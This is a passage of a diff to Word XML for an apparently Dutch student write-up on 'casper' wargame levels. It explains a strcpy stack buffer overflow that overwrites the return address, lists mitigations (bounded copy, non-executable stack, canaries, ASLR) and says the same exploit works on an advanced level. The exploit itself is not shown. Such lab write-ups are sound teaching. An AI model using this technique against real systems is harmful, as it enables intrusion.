+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> level </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>bevat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>een</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> stack-based buffer overflow</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>In de “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>g</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>reetUser</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>” functie wordt er gebruik gemaakt van de “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>strcpy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">” functie. Deze kopieer functie gaat de input </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>kopiëren</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> naar de buffer. Het is een onveilige functie omdat er niet wordt gekeken of de input langer is dan 999 karakters, hierdoor kan de aanvaller meer karakters geven als input en zo het return adres overschrijven</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (of zelfs verder)</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="nl-BE"/>
@@ -1880,85 +2214,21 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Vervolgens stopt het programma met een errorcode 1.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Indien er wel een parameter meegegeven wordt gaat </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>de “</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>greetUser</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>” functie opgeroepen worden met de meegegeven input.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Deze functie maakt een buffer aan van 999 karakters en gaat vervolgens de meegegeven input </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>kopiëren</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> naar deze buffer.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Tot slot print het “</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Hello</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>” gevolgd door de inhoud van de buffer.</w:t>
+        <w:t xml:space="preserve"> Deze aanval is mogelijk omdat het geen gebruik maakt van stack </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>canaries</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> en de stack is uitvoerbaar.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1974,182 +2244,17 @@
         <w:pStyle w:val="Kop3"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc25519922"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>Vulnerability</w:t>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="4" w:name="_Toc25519923"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Exploit beschrijving</w:t>
       </w:r>
       <w:bookmarkEnd w:id="4"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>Dit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> level </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>bevat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>een</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> stack-based buffer overflow</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>In de “</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>g</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>reetUser</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>” functie wordt er gebruik gemaakt van de “</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>strcpy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">” functie. Deze kopieer functie gaat de input </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>kopiëren</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> naar de buffer. Het is een onveilige functie omdat er niet wordt gekeken of de input langer is dan 999 karakters, hierdoor kan de aanvaller meer karakters geven als input en zo het return adres overschrijven</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (of zelfs verder)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Deze aanval is mogelijk omdat het geen gebruik maakt van stack </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>canaries</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> en de stack is uitvoerbaar.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop3"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc25519923"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Exploit beschrijving</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="5"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2793,7 +2898,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc25519924"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc25519924"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -2801,148 +2906,424 @@
         </w:rPr>
         <w:t>Mitigation</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="5"/>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Deze aanval kan op v</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">erschillende manieren </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>worden</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>gemitigate</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>De implementatie van de c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ode kan aangepast worden door gebruik maakt van de </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>strcpy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">functie met 3 parameters. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Deze extra parameter geeft het maximum aantal karakters dat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> gekopieerd kan worden naar de buffer. Specifiek in dit </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>programma</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is het maximum gelijk aan 999 karakters.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Een tweede manier is d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>oor gebruik te maken van een niet uitvoerbare stack. Hierdoor kan het returnadres nog steeds overschreven worden maar de code kan niet uitgevoerd worden</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in de stack</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Een derde manier is d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">oor gebruik te maken van stack </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>canaries</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Deze </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>canar</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>y</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is een g</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">eheim die geplaatst is op de stack en dewelke verandert </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">telkens </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">het programma uitgevoerd wordt. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Als de stack overschreven wordt gaat de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>canary</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ook overschreven worden. Bij elke functie return gaat gekeken worden of de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>canary</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> aangepast werd, als dit het geval is stop het programma onmiddellijk.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Een vierde mitigatie is d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">oor gebruik te maken van ASLR, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Address</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Space </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Layout</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Randomization</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Dit maakt het moeilijker om het correcte adres te specifiëren van de shell code.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop2"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="6" w:name="_Toc25519925"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Advanced level: Casper41</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="6"/>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Deze aanval kan op v</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">erschillende manieren </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>worden</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>gemitigate</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>De implementatie van de c</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ode kan aangepast worden door gebruik maakt van de </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>“</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>strcpy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>“</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">functie met 3 parameters. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Deze extra parameter geeft het maximum aantal karakters dat</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> gekopieerd kan worden naar de buffer. Specifiek in dit </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>programma</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> is het maximum gelijk aan 999 karakters.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Een tweede manier is d</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>oor gebruik te maken van een niet uitvoerbare stack. Hierdoor kan het returnadres nog steeds overschreven worden maar de code kan niet uitgevoerd worden</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> in de stack</w:t>
-      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Dit geavanceerde level heeft d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>ezelfde structuur als casper4. Het enige verschil is dat de het gebruik maakt van de “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>clearEnvironment</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>” functie om de environment variabelen te verwijderen.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Dezelfde exploit als deze van casper4 kan gebruikt worden omdat deze oplossing niet gebruik maakt van environment variabelen.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Het bevat nog steeds dezelfde </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>vulnerabilities</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="nl-BE"/>
@@ -2952,282 +3333,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Een derde manier is d</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">oor gebruik te maken van stack </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>canaries</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Deze </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>canar</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>y</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> is een g</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">eheim die geplaatst is op de stack en dewelke verandert </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">telkens </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">het programma uitgevoerd wordt. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Als de stack overschreven wordt gaat de </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
